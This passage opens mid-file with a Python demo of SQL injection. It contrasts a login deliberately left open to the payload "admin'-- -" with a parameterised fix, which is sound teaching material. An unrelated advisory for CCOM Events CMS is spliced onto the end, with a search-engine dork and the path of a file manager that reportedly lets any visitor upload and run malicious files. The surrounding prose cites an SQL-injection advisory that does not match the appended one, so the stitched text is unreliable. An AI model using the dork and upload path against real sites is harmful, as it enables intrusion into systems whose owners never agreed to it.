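    # Toy hash for the demo only; production code uses a slow salted KDF (argon2/bcrypt/scrypt).
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed in-memory user table with a single admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)")
    conn.execute("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
                 ("admin", hash_pw("correct-horse-battery")))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the advisory's payload defeats: user input spliced into the SQL text.

    With username "admin'-- -" the statement becomes
        SELECT id FROM users WHERE username = 'admin'-- -' AND pw_hash = '...'
    and everything after -- is a comment, so the password is never compared.
    """
    query = "SELECT id FROM users WHERE username = '%s' AND pw_hash = '%s'" % (username, hash_pw(password))
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised lookup plus constant-time hash comparison.

    The quote and the comment marker are just characters inside a bound value, so
    the driver looks for a user literally named "admin'-- -" and finds nothing.
    """
    row = conn.execute("SELECT pw_hash FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], hash_pw(password))


if __name__ == "__main__":
    db = make_db()
    print("string-built query, payload:", login_vulnerable(db, "admin'-- -", "P@cK3t"))  # True
    print("parameterised query, payload:", login_safe(db, "admin'-- -", "P@cK3t"))      # False
    print("parameterised query, real password:", login_safe(db, "admin", "correct-horse-battery"))  # True
```

The fix is the bound parameter, not input filtering: escaping quotes by hand is exactly what the `\` probe in the porViaX advisory is designed to trip up, whereas a prepared statement never lets the value reach the SQL parser at all.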
<pre><code>====================================================================================================================================<br />| # Title : CCOM Events CMS v0.1.02 upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : http://www.cyberunivers.com/ | <br />| # Dork : "details_news.php?id_news= " |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them.<br /><br />[+] use payload : /js/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php<br /><br />[+] http://127.0.0.1/sacot-dzcom/js/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>